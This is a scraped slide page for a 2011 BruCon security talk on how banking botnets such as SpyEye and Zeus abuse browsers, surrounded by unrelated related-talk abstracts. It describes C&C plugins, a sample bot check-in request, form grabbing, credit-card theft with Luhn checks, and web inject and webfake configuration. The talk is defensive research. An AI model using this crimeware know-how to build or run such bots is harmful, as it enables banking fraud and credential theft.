This document discusses browser malware and botnets. It provides a taxonomy of browser malware classes and describes how bots and browsers can work collaboratively. Bots use custom SDKs and plugins to communicate with command and control servers using the browser interface. The document outlines how bots can exploit browsers to inject content and download other malware. It also describes how bots can fingerprint browsers, use browser exploit packs, take screenshots, grab form data, and steal credit card numbers by manipulating the browser.
The Magic of Headless Browser + Puppeteer: Using DevTools Without opening DevTools & GitKraken as a legendary Git GUI Client
1. The power of "Headless Browser". Your invincible genie.
2. Extending the power of headless even more - amazing things we can do with "Puppeteer".
3. "GitKraken" - an intuitive Git GUI client that 1.7 Million+ Devs Rely on.
The Magic of Headless Browser + Puppeteer: Using DevTools Without opening DevTools & GitKraken as a legendary Git GUI Client
1. The power of "Headless Browser". Your invincible genie.
2. Extending the power of headless even more - amazing things we can do with "Puppeteer".
3. "GitKraken" - an intuitive Git GUI client that 1.7 Million+ Devs Rely on.
A Botnet Detecting Infrastructure Using a Beneficial BotnetTakashi Yamanoue
A beneficial botnet, which tries to cope with technology of malicious botnets such as peer to peer (P2P) networking and Domain Generation Algorithm (DGA), is discussed. In order to cope with such botnets’ technology, we are developing a beneficial botnet as an anti-bot measure, using our previous beneficial bot. The beneficial botnet is a group of beneficial bots. The P2P communication of malicious botnet is hard to detect by a single Intrusion Detection System (IDS). Our beneficial botnet has the ability to detect P2P communication, using collaboration of our beneficial bots. The beneficial bot could detect communication of the pseudo botnet which mimics malicious botnet communication. Our beneficial botnet may also detect communication using DGA. Furthermore, our beneficial botnet has ability to cope with new technology of new botnets, because our beneficial botnet has the ability to evolve, as same as malicious botnets.
Master of Web Puppets: Abusing Web Browsers for Persistent and Stealthy Compu...Panagiotis Papadopoulos
The proliferation of web applications has essentially transformed modern browsers into small but powerful operating systems. Upon visiting a website, user devices run implicitly trusted script code, the execution of which is confined within the browser to prevent any interference with the user’s system. Recent JavaScript APIs, however, provide advanced capabilities that not only enable feature-rich web applications, but also allow attackers to perform malicious operations despite the confined nature of JavaScript code execution.
In this paper, we demonstrate the powerful capabilities that modern browser APIs provide to attackers by presenting MarioNet: a framework that allows a remote malicious entity to control a visitor’s browser and abuse its resources for unwanted computation or harmful operations, such as cryptocurrency mining, password-cracking, and DDoS. MarioNet relies solely on already available HTML5 APIs, without requiring the installation of any additional software. In contrast to previous browser- based botnets, the persistence and stealthiness characteristics of MarioNet allow the malicious computations to continue in the background of the browser even after the user closes the window or tab of the initially visited malicious website. We present the design, implementation, and evaluation of our prototype system, which is compatible with all major browsers, and discuss potential defense strategies to counter the threat of such persistent in- browser attacks. Our main goal is to raise awareness about this new class of attacks, and inform the design of future browser APIs so that they provide a more secure client-side environment for web applications.
Micro Frontends
“Extending the microservice idea to frontend development”.
What does it really mean? Is it just abusing a certain hype? Should I consider it? How should I approach it?
These are just some of the questions one might ask when presented with this notion. Long story short – Micro front-ends are a reality! However, it is not for everyone.
In this session, we’re going to demystify micro frontends. We’re going to establish what it is, when it should be considered and the decisions to be made
ToorCon 14 : Malandroid : The Crux of Android InfectionsAditya K Sood
The Android platform has been plagued by malware for the past several years. Despite all attempts to detect and mitigate malicious applications on Android, malware is still flying under our radar and getting on our devices and causing millions of users financial and data loss every year. Additionally, the malware analysis community is at a large disagreement on how Android malware should be classified. In this talk, we’ll dive into the tactics, tools and procedures used by Android malware today, including several case studies of exceptional malware samples. By analyzing real code used by malware in the wild, we’ll be able to show the advancements in Android malware from a design perspective.
When and why to stray from Chrome, Edge, or Firefox, some programs and extensions to support your Internet experience, and the increasing complexity of the dangers of going online.
The Internal Architecture of Chrome Developer ToolsMiroslav Bajtoš
The talk explains that Chrome Developer Tools are actually just an (un)usual web page, every Blink browser has an embedded WebSocket server and that allows Node Inspector to reuse Developer Tools GUI for building Node.js debugger.
oVirt UI Plugin Infrastructure and the oVirt-Foreman pluginOved Ourfali
In this presentation I show how one can use the new oVirt-Engine UI-Plugin infrastructure,
to add a new oVirt UI plugins, and show an example of a Foreman-UI-plugin, that allows querying Foreman information on oVirt entities.
Emerging Trends in Online Social Networks MalwareAditya K Sood
Emerging trends in Social Networks Malware.
Social networks, such as Facebook, Twitter, and others pose a grave
threat to the security and privacy of users. This presentation highlights malware infection strategies
used by attackers to infect social networking websites and addresses security from the user
perspectives—outlining effective, secure steps that can reduce the impact of malware infections
Enfilade: Tool to Detect Infections in MongoDB InstancesAditya K Sood
Attackers are targeting MongoDB instances for conducting nefarious operations on the Internet. The cybercriminals are targeting exposed MongoDB instances and trigger infections at scale to exfiltrate data, destruct data, and extort money via ransom.
More Related Content
Similar to BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in the Ghost Shell)
A Botnet Detecting Infrastructure Using a Beneficial BotnetTakashi Yamanoue
A beneficial botnet, which tries to cope with technology of malicious botnets such as peer to peer (P2P) networking and Domain Generation Algorithm (DGA), is discussed. In order to cope with such botnets’ technology, we are developing a beneficial botnet as an anti-bot measure, using our previous beneficial bot. The beneficial botnet is a group of beneficial bots. The P2P communication of malicious botnet is hard to detect by a single Intrusion Detection System (IDS). Our beneficial botnet has the ability to detect P2P communication, using collaboration of our beneficial bots. The beneficial bot could detect communication of the pseudo botnet which mimics malicious botnet communication. Our beneficial botnet may also detect communication using DGA. Furthermore, our beneficial botnet has ability to cope with new technology of new botnets, because our beneficial botnet has the ability to evolve, as same as malicious botnets.
Master of Web Puppets: Abusing Web Browsers for Persistent and Stealthy Compu...Panagiotis Papadopoulos
The proliferation of web applications has essentially transformed modern browsers into small but powerful operating systems. Upon visiting a website, user devices run implicitly trusted script code, the execution of which is confined within the browser to prevent any interference with the user’s system. Recent JavaScript APIs, however, provide advanced capabilities that not only enable feature-rich web applications, but also allow attackers to perform malicious operations despite the confined nature of JavaScript code execution.
In this paper, we demonstrate the powerful capabilities that modern browser APIs provide to attackers by presenting MarioNet: a framework that allows a remote malicious entity to control a visitor’s browser and abuse its resources for unwanted computation or harmful operations, such as cryptocurrency mining, password-cracking, and DDoS. MarioNet relies solely on already available HTML5 APIs, without requiring the installation of any additional software. In contrast to previous browser- based botnets, the persistence and stealthiness characteristics of MarioNet allow the malicious computations to continue in the background of the browser even after the user closes the window or tab of the initially visited malicious website. We present the design, implementation, and evaluation of our prototype system, which is compatible with all major browsers, and discuss potential defense strategies to counter the threat of such persistent in- browser attacks. Our main goal is to raise awareness about this new class of attacks, and inform the design of future browser APIs so that they provide a more secure client-side environment for web applications.
Micro Frontends
“Extending the microservice idea to frontend development”.
What does it really mean? Is it just abusing a certain hype? Should I consider it? How should I approach it?
These are just some of the questions one might ask when presented with this notion. Long story short – Micro front-ends are a reality! However, it is not for everyone.
In this session, we’re going to demystify micro frontends. We’re going to establish what it is, when it should be considered and the decisions to be made
ToorCon 14 : Malandroid : The Crux of Android InfectionsAditya K Sood
The Android platform has been plagued by malware for the past several years. Despite all attempts to detect and mitigate malicious applications on Android, malware is still flying under our radar and getting on our devices and causing millions of users financial and data loss every year. Additionally, the malware analysis community is at a large disagreement on how Android malware should be classified. In this talk, we’ll dive into the tactics, tools and procedures used by Android malware today, including several case studies of exceptional malware samples. By analyzing real code used by malware in the wild, we’ll be able to show the advancements in Android malware from a design perspective.
When and why to stray from Chrome, Edge, or Firefox, some programs and extensions to support your Internet experience, and the increasing complexity of the dangers of going online.
The Internal Architecture of Chrome Developer ToolsMiroslav Bajtoš
The talk explains that Chrome Developer Tools are actually just an (un)usual web page, every Blink browser has an embedded WebSocket server and that allows Node Inspector to reuse Developer Tools GUI for building Node.js debugger.
oVirt UI Plugin Infrastructure and the oVirt-Foreman pluginOved Ourfali
In this presentation I show how one can use the new oVirt-Engine UI-Plugin infrastructure,
to add a new oVirt UI plugins, and show an example of a Foreman-UI-plugin, that allows querying Foreman information on oVirt entities.
Emerging Trends in Online Social Networks MalwareAditya K Sood
Emerging trends in Social Networks Malware.
Social networks, such as Facebook, Twitter, and others pose a grave
threat to the security and privacy of users. This presentation highlights malware infection strategies
used by attackers to infect social networking websites and addresses security from the user
perspectives—outlining effective, secure steps that can reduce the impact of malware infections
Enfilade: Tool to Detect Infections in MongoDB InstancesAditya K Sood
Attackers are targeting MongoDB instances for conducting nefarious operations on the Internet. The cybercriminals are targeting exposed MongoDB instances and trigger infections at scale to exfiltrate data, destruct data, and extort money via ransom.
Detecting Ransomware/Bot Infections in ElasticsearchAditya K Sood
Elasticsearch infections are rising exponentially. The adversaries are exploiting open and exposed Elasticsearch interfaces to trigger infections in the cloud and non-cloud deployments. During this talk, we will release a tool named "STRAFER" to detect potential infections in the Elasticsearch instances. The tool allows security researchers, penetration testers, and threat intelligence experts to detect compromised and infected Elasticsearch instances running malicious code. The tool also enables you to conduct efficient research in the field of malware targeting cloud databases.
BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...Aditya K Sood
Bot herders deploy Command and Control (C&C) panels for commanding and collecting exfiltrated data from the infected hosts on the Internet. To protect C&C panels, bot herders deploy several built-in (software-centric) protection mechanisms to restrict direct access to these C&C panels. However, there exist fundamental mistakes in the design and deployment of these C&C panels that can be exploited to take complete control. This talk discusses about the methodology of launching reverse attacks on the centralized C&C panels to derive intelligence that can be used to build automated solutions. This research reveals how to detect vulnerabilities and configuration flaws in the remote C&C panels and exploit them by following the path of penetration testing. This talk is derived from the real time research in which several C&C panels were targeted and intelligence was gathered to attack the next set of C&C panels. A number of case studies will be discussed to elaborate step-by-step process of attacking and compromising C&C panels. This talk also demonstrates the use of automated tools authored for making the testing easier for the researchers.
DOWNLOAD from this link : http://secniche.org/blackhat-2014/
BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...Aditya K Sood
C-SCAD is an information gathering and penetration testing tool written to assess the security issues present in the Web-X (Internet Explorer-based web interface) client used to interact with the ClearSCADA server. WebX client is hosted on the embedded web server which is shipped as a part of complete ClearSCADA architecture. Primarily, the WebX client is restricted to perform any configuration changes but it can reveal potential information about the ClearSCADA server and associated components. Insecure deployments of WebX client can reveal potential information about the various functions such as alarm pages, SQL lists, and diagnostic checks including various reports.
In this article, we discuss the design of an iframe injector used to infect web-hosting software such as cPanel in an automated manner. Several different iframe injector designs exist, but we look at one of the most basic: NiFramer.
CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...Aditya K Sood
Cyber criminals are using advanced attacks to exploit online banking systems and services to covertly steal money. This paper describes the tactics currently used by cyber criminals to conduct cyber bank robbery
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...James Anderson
Effective Application Security in Software Delivery lifecycle using Deployment Firewall and DBOM
The modern software delivery process (or the CI/CD process) includes many tools, distributed teams, open-source code, and cloud platforms. Constant focus on speed to release software to market, along with the traditional slow and manual security checks has caused gaps in continuous security as an important piece in the software supply chain. Today organizations feel more susceptible to external and internal cyber threats due to the vast attack surface in their applications supply chain and the lack of end-to-end governance and risk management.
The software team must secure its software delivery process to avoid vulnerability and security breaches. This needs to be achieved with existing tool chains and without extensive rework of the delivery processes. This talk will present strategies and techniques for providing visibility into the true risk of the existing vulnerabilities, preventing the introduction of security issues in the software, resolving vulnerabilities in production environments quickly, and capturing the deployment bill of materials (DBOM).
Speakers:
Bob Boule
Robert Boule is a technology enthusiast with PASSION for technology and making things work along with a knack for helping others understand how things work. He comes with around 20 years of solution engineering experience in application security, software continuous delivery, and SaaS platforms. He is known for his dynamic presentations in CI/CD and application security integrated in software delivery lifecycle.
Gopinath Rebala
Gopinath Rebala is the CTO of OpsMx, where he has overall responsibility for the machine learning and data processing architectures for Secure Software Delivery. Gopi also has a strong connection with our customers, leading design and architecture for strategic implementations. Gopi is a frequent speaker and well-known leader in continuous delivery and integrating security into software delivery.
In the rapidly evolving landscape of technologies, XML continues to play a vital role in structuring, storing, and transporting data across diverse systems. The recent advancements in artificial intelligence (AI) present new methodologies for enhancing XML development workflows, introducing efficiency, automation, and intelligent capabilities. This presentation will outline the scope and perspective of utilizing AI in XML development. The potential benefits and the possible pitfalls will be highlighted, providing a balanced view of the subject.
We will explore the capabilities of AI in understanding XML markup languages and autonomously creating structured XML content. Additionally, we will examine the capacity of AI to enrich plain text with appropriate XML markup. Practical examples and methodological guidelines will be provided to elucidate how AI can be effectively prompted to interpret and generate accurate XML markup.
Further emphasis will be placed on the role of AI in developing XSLT, or schemas such as XSD and Schematron. We will address the techniques and strategies adopted to create prompts for generating code, explaining code, or refactoring the code, and the results achieved.
The discussion will extend to how AI can be used to transform XML content. In particular, the focus will be on the use of AI XPath extension functions in XSLT, Schematron, Schematron Quick Fixes, or for XML content refactoring.
The presentation aims to deliver a comprehensive overview of AI usage in XML development, providing attendees with the necessary knowledge to make informed decisions. Whether you’re at the early stages of adopting AI or considering integrating it in advanced XML development, this presentation will cover all levels of expertise.
By highlighting the potential advantages and challenges of integrating AI with XML development tools and languages, the presentation seeks to inspire thoughtful conversation around the future of XML development. We’ll not only delve into the technical aspects of AI-powered XML development but also discuss practical implications and possible future directions.
Epistemic Interaction - tuning interfaces to provide information for AI supportAlan Dix
Paper presented at SYNERGY workshop at AVI 2024, Genoa, Italy. 3rd June 2024
https://alandix.com/academic/papers/synergy2024-epistemic/
As machine learning integrates deeper into human-computer interactions, the concept of epistemic interaction emerges, aiming to refine these interactions to enhance system adaptability. This approach encourages minor, intentional adjustments in user behaviour to enrich the data available for system learning. This paper introduces epistemic interaction within the context of human-system communication, illustrating how deliberate interaction design can improve system understanding and adaptation. Through concrete examples, we demonstrate the potential of epistemic interaction to significantly advance human-computer interaction by leveraging intuitive human communication strategies to inform system design and functionality, offering a novel pathway for enriching user-system engagements.
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...James Anderson
Effective Application Security in Software Delivery lifecycle using Deployment Firewall and DBOM
The modern software delivery process (or the CI/CD process) includes many tools, distributed teams, open-source code, and cloud platforms. Constant focus on speed to release software to market, along with the traditional slow and manual security checks has caused gaps in continuous security as an important piece in the software supply chain. Today organizations feel more susceptible to external and internal cyber threats due to the vast attack surface in their applications supply chain and the lack of end-to-end governance and risk management.
The software team must secure its software delivery process to avoid vulnerability and security breaches. This needs to be achieved with existing tool chains and without extensive rework of the delivery processes. This talk will present strategies and techniques for providing visibility into the true risk of the existing vulnerabilities, preventing the introduction of security issues in the software, resolving vulnerabilities in production environments quickly, and capturing the deployment bill of materials (DBOM).
Speakers:
Bob Boule
Robert Boule is a technology enthusiast with PASSION for technology and making things work along with a knack for helping others understand how things work. He comes with around 20 years of solution engineering experience in application security, software continuous delivery, and SaaS platforms. He is known for his dynamic presentations in CI/CD and application security integrated in software delivery lifecycle.
Gopinath Rebala
Gopinath Rebala is the CTO of OpsMx, where he has overall responsibility for the machine learning and data processing architectures for Secure Software Delivery. Gopi also has a strong connection with our customers, leading design and architecture for strategic implementations. Gopi is a frequent speaker and well-known leader in continuous delivery and integrating security into software delivery.
Communications Mining Series - Zero to Hero - Session 1DianaGray10
This session provides introduction to UiPath Communication Mining, importance and platform overview. You will acquire a good understand of the phases in Communication Mining as we go over the platform with you. Topics covered:
• Communication Mining Overview
• Why is it important?
• How can it help today’s business and the benefits
• Phases in Communication Mining
• Demo on Platform overview
• Q/A
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...Neo4j
Leonard Jayamohan, Partner & Generative AI Lead, Deloitte
This keynote will reveal how Deloitte leverages Neo4j’s graph power for groundbreaking digital twin solutions, achieving a staggering 100x performance boost. Discover the essential role knowledge graphs play in successful generative AI implementations. Plus, get an exclusive look at an innovative Neo4j + Generative AI solution Deloitte is developing in-house.
GridMate - End to end testing is a critical piece to ensure quality and avoid...ThomasParaiso2
End to end testing is a critical piece to ensure quality and avoid regressions. In this session, we share our journey building an E2E testing pipeline for GridMate components (LWC and Aura) using Cypress, JSForce, FakerJS…
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...DanBrown980551
Do you want to learn how to model and simulate an electrical network from scratch in under an hour?
Then welcome to this PowSyBl workshop, hosted by Rte, the French Transmission System Operator (TSO)!
During the webinar, you will discover the PowSyBl ecosystem as well as handle and study an electrical network through an interactive Python notebook.
PowSyBl is an open source project hosted by LF Energy, which offers a comprehensive set of features for electrical grid modelling and simulation. Among other advanced features, PowSyBl provides:
- A fully editable and extendable library for grid component modelling;
- Visualization tools to display your network;
- Grid simulation tools, such as power flows, security analyses (with or without remedial actions) and sensitivity analyses;
The framework is mostly written in Java, with a Python binding so that Python developers can access PowSyBl functionalities as well.
What you will learn during the webinar:
- For beginners: discover PowSyBl's functionalities through a quick general presentation and the notebook, without needing any expert coding skills;
- For advanced developers: master the skills to efficiently apply PowSyBl functionalities to your real-world scenarios.
Dr. Sean Tan, Head of Data Science, Changi Airport Group
Discover how Changi Airport Group (CAG) leverages graph technologies and generative AI to revolutionize their search capabilities. This session delves into the unique search needs of CAG’s diverse passengers and customers, showcasing how graph data structures enhance the accuracy and relevance of AI-generated search results, mitigating the risk of “hallucinations” and improving the overall customer journey.
Pushing the limits of ePRTC: 100ns holdover for 100 daysAdtran
At WSTS 2024, Alon Stern explored the topic of parametric holdover and explained how recent research findings can be implemented in real-world PNT networks to achieve 100 nanoseconds of accuracy for up to 100 days.
How to Get CNIC Information System with Paksim Ga.pptxdanishmna97
Pakdata Cf is a groundbreaking system designed to streamline and facilitate access to CNIC information. This innovative platform leverages advanced technology to provide users with efficient and secure access to their CNIC details.
Securing your Kubernetes cluster_ a step-by-step guide to success !KatiaHIMEUR1
Today, after several years of existence, an extremely active community and an ultra-dynamic ecosystem, Kubernetes has established itself as the de facto standard in container orchestration. Thanks to a wide range of managed services, it has never been so easy to set up a ready-to-use Kubernetes cluster.
However, this ease of use means that the subject of security in Kubernetes is often left for later, or even neglected. This exposes companies to significant risks.
In this talk, I'll show you step-by-step how to secure your Kubernetes cluster for greater peace of mind and reliability.
Building RAG with self-deployed Milvus vector database and Snowpark Container...Zilliz
This talk will give hands-on advice on building RAG applications with an open-source Milvus database deployed as a docker container. We will also introduce the integration of Milvus with Snowpark Container Services.
Sudheer Mechineni, Head of Application Frameworks, Standard Chartered Bank
Discover how Standard Chartered Bank harnessed the power of Neo4j to transform complex data access challenges into a dynamic, scalable graph database solution. This keynote will cover their journey from initial adoption to deploying a fully automated, enterprise-grade causal cluster, highlighting key strategies for modelling organisational changes and ensuring robust disaster recovery. Learn how these innovations have not only enhanced Standard Chartered Bank’s data infrastructure but also positioned them as pioneers in the banking sector’s adoption of graph technology.
BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in the Ghost Shell)
1. Botnets and Browsers
Brothers in the Ghost Shell
BruCon Security/Hacking Conference
Brussels . 19-20 September, 2011
Aditya K Sood (Security Practitioner)
SecNiche Security | Department of Computer Science and Engineering
Michigan State University
2. Whoami !
Aditya K Sood
─ Founder , SecNiche Security Labs
● Independent Security Consultant, Researcher and Practitioner
● Worked previously for Armorize, Coseinc and KPMG
● Active Speaker at Security conferences
● Written Content – Virus Bulletin/
ISSA/ISACA/CrossTalk/HITB/Hakin9/Elsevier NESE|CFS
● LinkedIn : http://www.linkedin.com/in/adityaks
● Website: http://www.secniche.org | Blog: http://secniche.blogspot.com
─ PhD Candidate at Michigan State University
● http://www.cse.msu.edu/~soodadit
2
3. Overview and Disclaimer
Benchmark
─ This talk discusses about the infection model of browsers and bots
─ Botnets have many capabilities. Our target is only browsers and bots.
● Mainly exploitation of browsers.
─ This talk is not about simple botnet commands. Sorry !
─ Scope is third generation botnets and browser manipulation
─ This research relates to my own efforts and does not provide the view of
any of my employers.
3
4. Agenda
Walking through the Agenda
─ Browser Malware Taxonomy
─ Bots & Browsers – Collaborative Design
─ Bots & Browsers – Exploitation Paradigm
─ Browser/ Bot – Web Injects & Web Fakes
─ Conclusion
4
7. Browser Malware Taxonomy
Class A – Browser Malware
http://www.virusbtn.com/virusbulletin/archive/2011/06/vb201106-browser-malware-taxonomy
7
8. Browser Malware Taxonomy
Class B – Browser Malware
http://www.virusbtn.com/virusbulletin/archive/2011/06/vb201106-browser-malware-taxonomy
8
9. Browser Malware Taxonomy
Class C – Browser Malware
http://www.virusbtn.com/virusbulletin/archive/2011/06/vb201106-browser-malware-taxonomy
9
10. Infection Model – Malware Serving
Exploiting Web vulnerabilities ( XSS/SQL)
Obfuscated Code Injected
JavaScript eval() – The Evil Machine
Browser DOM Calls
Rendered Interactive Frames
Pointed to Malicious Domain
10
11. Drive by Downloads – Insidious Infection
Browser – Loads Malicious URL
Vulnerability in Browser is Exploited
Exploits trigger Shellcode
Malware Binary Dropped
Parasitic Infection Occurs in System
Malware Installed and Connect Back
11
13. Browsers Botnets :SDK
Custom Designed SDK
─ Botnets use self build SDK
for infection purposes
─ Browser communication
● Bots use the SDK functions
with plugins to communicate
back to C&C using browser
interface
─ Concept of Bot Development
Kit (BDT) – as similar to
SDK
─ Example:
● SpyEye BDT
13
14. Bots and Custom Connector Plugin
Design of Plugins
● Bot requires separate plugin to communicate back with the C&C server
● Bot sends critical information through GET requests
Why Plugin is Used?
● Provides modular control over the bots
● Update the main bot executable present on the victim machine
● Update the bot configuration directly through admin panel
● Start/Stop for a bot plugin – Depends on the availability
What Type of Information?
● gate.php?guid=!USER-
5C377A2CCF!046502F4&ver=10207&stat=ONLINE&ie=6.0.2900.2180&os=
5.1.2600&ut=Admin&ccrc=13A7F1B3&md5=b9c3cb2cdc66b1f4465fe56cc3
4040b2&plg=customconnector
14
15. Bots and Custom Connector Plugin
Design of Plugins
● API in Action
– TakeBotGuid / TakeBotVersion / TakeConfigCrc32Callback
TakeBotExeMd5Callback / TakePluginsListCallback
Gate.php
Get Page
Custom Connector Plugin
Input – Main Panel Output – Main Panel
SpyEye Bot
15
16. Custom Connector Plugin
What Lies Beneath ?
● A mediator between bot and the main admin panel
● Good enough to make decisions whether to send request to C&C or not
● Generates encryption based channel between C&C and itself
● Very productive for creating decentralized botnet based on plugins
Operations !
● Update bot configuration - UPDATE_CONFIG
● Update bot executable - UPDATE
● Manage plugins – PLUGIN
● Load third-party exe - LOAD
16
19. Reality of the Bots
Inside Bot - Characteristics
● Similar working to ring 3 rootkit
– Hooking and hijacking in userland space
– Perform injections in the web processes
● Hooks HTTP communication interface
– Exploit browsers - on the fly content injections
● Infection = {Bots + Plugins}
19
20. Man In the Browser (MITB)
The Reality of MITB
● Malware (bot/trojan) having an ability to infect victim browsers
● Capable enough to modify web pages, perform non legitimate transactions
● Invisible to users and browsers
● Steal the credit card number efficiently
● Spying on browser sessions
http://www.cronto.com/download/internet_banking_fraud_beyond_phishing.pdf
20
21. Browser – User Agent Fingerprinting
User Agent Fingerprinting
─ Detecting the state of running browser in the system
─ Provides plethora of information about browser versions
● Typically requires to serve specific exploits for downloading bots
User visits a malware domain
Browser sends a User Agent string Malware exploits the browser
Malware scans the User Agent string Malware detects the browser version
21
25. Browser Exploit Packs and Bots
Is This True Artifact?
─ Yes it is.
– BEP’s are used in conjunction with botnets
– On successful exploitation, bot is dropped onto the victim machine
– Harnessing the power of two different frameworks to deliver malware
– Some traces have been seen of ZEUS (Botnet) + BlackHole (BEP)
25
26. Browser – Screen Scrapers
Why?
● Capturing screenshots from the victim machines during bank transactions
● It is possible to capture whole system screenshots not only the browser
activities
● Provides additional support for bots for data exfiltration
● Exploit the system level functions and generic modules
How?
─ Mouse cursor is the reference point which is the center of the screenshot
─ Explicit rules are defined for capturing screenshots
─ Rules consist of following parameters
● URL_MASK
● WIDTH
● HEIGHT
● MINIMUM_CLICKS
● MINIMUM_SECONDS
26
28. Browsers - Form Grabbing
Why?
─ Keylogging produces plethora of data
─ Form grabbing – extracting data from the GET/POST requests
─ Based on the concept of hooking and DLL injection
─ Virtual Keyboards
● Implements the form grabbing functionality to send POST requests
● No real protection against malware
28
29. Browsers - Form Grabbing
Facts and Reality
─ All the botnets (Banking, IRC etc) use this technique
─ Very hard to overcome the consequences
─ All browsers can be circumvented to execute non legitimate hooks
29
30. Credit Card Grabber - Verification
Why the Credit Card number stealing is a success?
● Bots are always successful in extracting credentials from the POST request
● Question – Aren’t bot make mistakes in extracting Credit Card (CC) numbers?
● Well, bots are very smart in nature. They use inbuilt CC plugins.
● CC Verification – The credit card number is verified against LUHN’s
algorithm prior to send it to botnet database. Viola !
30
32. Web Injects – Infection on the Fly
Web Injects
─ Injecting incoming request with malicious content
─ Web page is tampered which looks legitimate
● Primary aim is to inject credential stealing forms and input tags
● Similar concept is used to inject pointers to remote malware site
● Concept of Third Generation Botnets ( Give me your money )
32
33. Web Injects – How ?
Web Injects
─ Hooking
● Long live exploitation technique
─ Browser Libraries
● Hooking nspr4.dll and wininet.dll
– IAT hooking, Inline hooking or through DLL injections.
● Webinjects.txt
– Rule file used for defining injection metrics (discussed in next part)
– Used for debugging purposes to test and verify the injections before the actual bot
performs infection
– The exploitation is done on the HTTP responses returning back form the sever
33
34. Web Injects – Log Detection
http://secniche.blogspot.com/2011/07/spyeye-zeus-web-injects-parameters-and.html
34
36. Web Injects – Metrics
What is meant by GPH flags?
─ Exploitation and infection metrics
● G - injection will be made only for the resources that are requested by the GET
● P - injection will be made only for the resources that are requested by the POST
● L - is a flag for grabbing content between the tags data_before and data_after
inclusive
● H – similar as L except the ripped content is not included and the contents of
tags data_before and data_after
36
37. Web Injects – Zeus and SpyEye
Web Injects
─ Sequence of metrics (as discussed earlier)
● SpyEye – sequence should follow data_before, data_inject, data_after
● Zeus –sequence does not matter
─ Injection content
● SpyEye requires specific rules to be designed using set_url
● Zeus primarily injects malicious Cascading Style Sheets (CSS) and JavaScripts
(JS).
─ Source – bots
● Zeus and SpyEye bots perform the requisite infection
● Bot reads the configuration parameters using plugin interface
● Browser’s HTTP communication channel is infected
37
38. Web Fakes
Understanding Web Fakes
● Plugins used to spoof the content in browsers
● Supports both protocols HTTP/HTTPS
● Based on the concept of internal URL redirection
● All browsers are affected
How ?
─ Plugins use the defined metrics in the configuration file
● URL_MASK
● URL_REDIRECT
● FLAGS
● POST_BLACK_MASK
● POST_WHITE_MASK
● BLOCK_URL
● WEBFAKE_NAME
● UNBLOCK_URL
38
42. Conclusion
So What !
─ Third generation botnets success greatly depends on browsers
─ Browser has become the most predominant part of exploitation
─ Dropping bots using Drive by Downloads is an easy process
─ Hooking browser is not a big stake factor
─ Bot Development Kits (BDKs) are in action
─ Browser is the main window to the internet, so as to the risk
─ Hard to prevent malware that resides inside browsers
─ Plugins-Addons are also responsible for circumventing the browser
security
─ Protection requires much more efforts than the present times
42
43. Questions / Thanks
BruCon Crew
─ For all the support and help
SecNiche Security Labs
─ All my team members for their cooperation
Contact
─ LinkedIn – http://www.linkedin.com/in/adityaks
─ Twitter - @AdityaKSood
43